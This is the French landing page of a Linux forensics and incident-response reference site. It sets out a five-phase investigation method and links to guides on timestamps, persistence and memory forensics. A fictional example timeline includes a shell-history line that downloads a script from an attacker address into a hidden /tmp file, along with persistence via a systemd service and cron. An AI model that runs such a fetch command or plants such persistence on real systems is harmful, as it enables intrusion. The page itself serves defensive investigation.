Aller au contenu

Référence terrain du DFIR Linux

Enquêtez sur des hôtes Linux en toute confiance.

Où se trouvent les preuves, ce qu'elles démontrent et comment les collecter sans les détruire : journaux et journal systemd, historique shell, persistance, horodatages ext4 et XFS, mémoire, conteneurs et tri.

domaines d'investigation
9
guides approfondis
11
termes du glossaire
12
super-chronologie · web-prod-03UTC
  1. 02:13:07auth.logsshd: Accepted publickey for deploy from 203.0.113.50
  2. 02:13:41bash_historycurl -s http://203.0.113.50/k.sh -o /tmp/.k
  3. 02:14:02ext4 crtime/tmp/.k born · inode 1310722
  4. 02:15:19journalsystemd: Enabled dbus-helper.service
  5. 02:15:20ext4 mtime/usr/bin/ss replaced · dpkg -V: ??5??????
  6. 02:31:55cron(root) CMD (/usr/lib/.cache/upd)
$psort.py -o l2tcsv case.plaso "date > '2026-03-14 02:00:00'"
Exemple illustratif : une intrusion fictive reconstituée à partir de cinq sources d'artefacts.

/var/evidence

La carte de la forensique Linux

Neuf domaines couvrent les artefacts qui comptent sur un système Linux compromis. Chacun renvoie vers des guides détaillés avec commandes, tableaux et pièges.

méthode

De la première alerte à une chronologie défendable

Les cinq mêmes phases s'appliquent, qu'il s'agisse d'une VM cloud ou d'un parc de serveurs.

  1. 01

    Préserver

    Capturer d'abord le volatil : mémoire, processus, sockets. Figer ou imager les disques et consigner les empreintes.

  2. 02

    Trier

    Lancer UAC ou un collecteur Velociraptor pour récupérer journaux, historiques et configuration en quelques minutes.

  3. 03

    Analyser

    Lire les journaux d'authentification, le journal systemd, l'historique shell, la persistance et l'état des paquets.

  4. 04

    Corréler

    Fusionner système de fichiers, journaux et mémoire en une super-chronologie UTC et pivoter.

  5. 05

    Rapporter

    Dire ce que chaque artefact prouve, ce qu'il ne prouve pas et comment vous l'avez vérifié.

~/guides

Derniers guides

Ces guides sont pour l'instant publiés en anglais uniquement. Les liens ci-dessous ouvrent la version anglaise.

Voir tous les guides
05 · Système de fichiers & horodatagesAnglais

ext4 and XFS Timestamps, Inodes and Deleted Files

How to read MAC and birth timestamps on ext4 and XFS, spot timestomping through ctime, and understand the real limits of deleted file recovery on Linux.

ext4xfstimestamps
04 · PersistanceAnglais

Hunting Linux Persistence: Cron, systemd, SSH and More

Where attackers hide persistence on Linux (cron, systemd units and timers, shell startup files, SSH keys, ld.so.preload, PAM, udev, modules) and how to find it.

persistencecronsystemd
06 · Forensique mémoireAnglais

Linux Memory Forensics with LiME, AVML and Volatility 3

Acquire Linux RAM with LiME or AVML, build Volatility 3 symbol tables with dwarf2json, and find hidden processes, rootkit modules and bash history in memory.

memory-forensicsvolatilitylime